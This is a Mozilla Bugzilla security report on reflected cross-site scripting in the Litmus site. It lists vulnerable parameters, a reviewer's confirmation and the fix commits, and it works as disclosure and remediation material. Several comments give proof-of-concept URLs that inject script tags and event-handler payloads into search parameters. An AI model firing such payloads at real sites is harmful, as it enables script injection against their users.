Closed
Bug 613272
Opened 14 years ago
Closed 13 years ago
Reflected XSS in https://litmus.mozilla.org/
Categories
(Webtools Graveyard :: Litmus, defect, P2)
Webtools Graveyard
Litmus
Tracking
(Not tracked)
VERIFIED
FIXED
People
(Reporter: ervistusha, Assigned: coop)
References
()
Details
(Keywords: wsec-xss, Whiteboard: [infrasec:xss][ws:high])
User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.12) Gecko/20101027 Ubuntu/10.10 (maverick) Firefox/3.6.12 Build Identifier: https://litmus.mozilla.org/advanced_search.cgi?test_run=&product=&branch=&testgroup=&subgroup=&testcase=&platform=&opsys=&locale=&result_status=&start_date=×pan=&end_date=Now&search_field1=build_id&match_criteria1=contains_all&search_value1=%3Cscript%3Ealert(1)%3C/script%3E&search_field2=%3Cscript%3Ealert(1)%3C/script%3E&match_criteria2=contains_all&search_value2=%3Cscript%3Ealert(1)%3C/script%3E&search_field3=%3Cscript%3Ealert(1)%3C/script%3E&match_criteria3=contains_all&search_value3=%3Cscript%3Ealert(1)%3C/script%3E&search_field4=%3Cscript%3Ealert(1)%3C/script%3E&match_criteria4=contains_all&search_value4=%3Cscript%3Ealert(1)%3C/script%3E&sort_field1=%3Cscript%3Ealert(1)%3C/script%3E&sort_order1=ASC&sort_field2=%3Cscript%3Ealert(1)%3C/script%3E&sort_order2=ASC&sort_field3=&sort_order3=ASC&sort_field4=&sort_order4=ASC&limit=15&automated=all&withbugs=all Reproducible: Always Steps to Reproduce: 1.https://litmus.mozilla.org/advanced_search.cgi?test_run=&product=&branch=&testgroup=&subgroup=&testcase=&platform=&opsys=&locale=&result_status=&start_date=×pan=&end_date=Now&search_field1=build_id&match_criteria1=contains_all&search_value1=%3Cscript%3Ealert(1)%3C/script%3E&search_field2=%3Cscript%3Ealert(1)%3C/script%3E&match_criteria2=contains_all&search_value2=%3Cscript%3Ealert(1)%3C/script%3E&search_field3=%3Cscript%3Ealert(1)%3C/script%3E&match_criteria3=contains_all&search_value3=%3Cscript%3Ealert(1)%3C/script%3E&search_field4=%3Cscript%3Ealert(1)%3C/script%3E&match_criteria4=contains_all&search_value4=%3Cscript%3Ealert(1)%3C/script%3E&sort_field1=%3Cscript%3Ealert(1)%3C/script%3E&sort_order1=ASC&sort_field2=%3Cscript%3Ealert(1)%3C/script%3E&sort_order2=ASC&sort_field3=&sort_order3=ASC&sort_field4=&sort_order4=ASC&limit=15&automated=all&withbugs=all 2. 3.
Reporter | ||
Comment 1•14 years ago
|
||
seem litmus have a lot of bugs if you like I can do careful scan
Updated•14 years ago
|
Group: core-security → websites-security
Component: General → Other
Product: Core → Websites
QA Contact: general → other
Updated•14 years ago
|
Group: websites-security → webtools-security
Component: Other → Litmus
Product: Websites → Webtools
QA Contact: other → litmus
Version: unspecified → other
Comment 2•14 years ago
|
||
Reflected xss issue confirmed on litmus website.
Status: UNCONFIRMED → NEW
Ever confirmed: true
Reporter | ||
Comment 3•14 years ago
|
||
https://litmus.mozilla.org/search_results.cgi?product=%3Cscript%3Ealert%281%29%3C/script%3E
Reporter | ||
Comment 4•14 years ago
|
||
https://litmus.mozilla.org/edit_users.cgi seems vulnerable sorry for the spam today :)
Updated•14 years ago
|
Whiteboard: [infrasec:xss][ws:high]
Comment 7•13 years ago
|
||
Additional parameters are vulnerable POC from 648857 search_results.cgi result_status https://litmus.mozilla.org/search_results.cgi?limit=50&order_by_created=DESC&result_status="><script>alert(String.fromCharCode(88,83,83))</script> advanced_search.cgi product https://litmus.mozilla.org/advanced_search.cgi?test_run=&product="<B onmouseover="document.location='http://www.google.com/'">
Comment 11•13 years ago
|
||
Other vulnerable parameters from above bugs 625007 page: search_results.cgi parameter: result_status 622109 page: advanced_search.cgi parameter: test_run 622186 page: advanced_search.cgi parameter: test_run, result_status, locale, match_criteria
Comment 13•13 years ago
|
||
Sorry for the bug spam. This should be the last one From 626032 advanced_search.cgi branch
Assignee | ||
Updated•13 years ago
|
Assignee: nobody → coop
Status: NEW → ASSIGNED
Priority: -- → P2
Assignee | ||
Comment 14•13 years ago
|
||
Sort/search validation added by: http://hg.mozilla.org/webtools/litmus/rev/0921d91aed12 Other search vulns fixed by other commits since the bug was filed.
Status: ASSIGNED → RESOLVED
Closed: 13 years ago
Resolution: --- → FIXED
Comment 15•13 years ago
|
||
fixed? wtf...for me still works fine !
Assignee | ||
Comment 16•13 years ago
|
||
(In reply to comment #15) > fixed? wtf...for me still works fine ! Could you please be more specific? There are 8 vulns mentioned in this bug (only some of which have example queries), not including those that were duped to this one.
Comment 17•13 years ago
|
||
I've looked and I couldn't replicate any of the vulns mentioned in this bug or any of the dupes which I had access to (1). I've asked for a security flag on my Bugzilla account, but I was denied. Wonder if I can appeal that decision?
Comment 18•13 years ago
|
||
Checked POCs listed in this bug and duplicates. Confirmed that all issues are properly handled. If anyone observes vulnerabilities that are still present than please file a new bug and include a note that the item was looked at per this bug.
Status: RESOLVED → VERIFIED
Comment 19•13 years ago
|
||
already sended another poc
Comment 20•13 years ago
|
||
https://litmus.mozilla.org/search_results.cgi?order_by_created=DESC×pan=all&result_status=fail&limit=50'"--></style></script><script>alert('XSS')</script> http://oi51.tinypic.com/2hogqdg.jpg :-P
Reporter | ||
Comment 21•13 years ago
|
||
How can i unsubscribe from this bug i report it some month ago :) if i have time i will scan site again :) I wasn`t reward for XSS and SQL reported at litmus :( also I think adding "\" will not fix XSS bug
Comment 22•13 years ago
|
||
(In reply to comment #21) > How can i unsubscribe from this bug Beside "CC List" click edit, select your email address and check the box "Remove selected CC" and click Save Changes at the bottom of the bug. However, this will only work if you are on the CC list. I'm not sure how, or even if you can remove yourself from a bug which you reported.
Assignee | ||
Comment 23•13 years ago
|
||
(In reply to comment #21) > How can i unsubscribe from this bug > i report it some month ago :) I can't see the security bugs either until I get cc-ed on them, but I do try to turn them around quickly once I am. > also I think adding "\" will not fix XSS bug And yet the above examples no longer work. (In reply to comment #20) > https://litmus.mozilla.org/search_results. > cgi?order_by_created=DESC×pan=all&result_status=fail&limit=50'"--></ > style></script><script>alert('XSS')</script> Is this the same bug you're talking about in comment 19? Either file a new bug *or* post something here otherwise something will get missed. Fixed by: http://hg.mozilla.org/webtools/litmus/rev/a94e98b1bfb5
Updated•12 years ago
|
Group: webtools-security
Comment 25•11 years ago
|
||
Adding keywords to bugs for metrics, no action required. Sorry about bugmail spam.
Keywords: wsec-xss
Updated•8 years ago
|
Product: Webtools → Webtools Graveyard
You need to log in
before you can comment on or make changes to this bug.
Description
•